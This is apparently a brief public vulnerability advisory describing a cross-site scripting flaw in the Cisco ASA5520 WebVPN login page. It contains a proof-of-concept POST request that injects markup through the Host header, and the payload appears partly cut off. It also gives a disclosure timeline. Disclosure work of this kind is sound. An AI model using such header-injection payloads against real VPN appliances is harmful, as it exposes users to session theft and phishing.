- Cisco ASA5520 Web VPN Host Header XSS
- Description
Cross-site scripting.
- Product
Cisco, ASA5520, IOS 7.2(2)22
- PoC
Modified request:
POST /+webvpn+/index.html HTTP/1.1
Host: "'>
WebVPN Service
- Solution
None
- Timeline
2007-09-17: Vulnerability Discovered
2008-02-15: Disclosed to Vendor (auto-reply)
2009-04-02: Disclosed to Public (XSS is so 1999)
--
BugsNotHugs
Shared Vulnerability Disclosure Account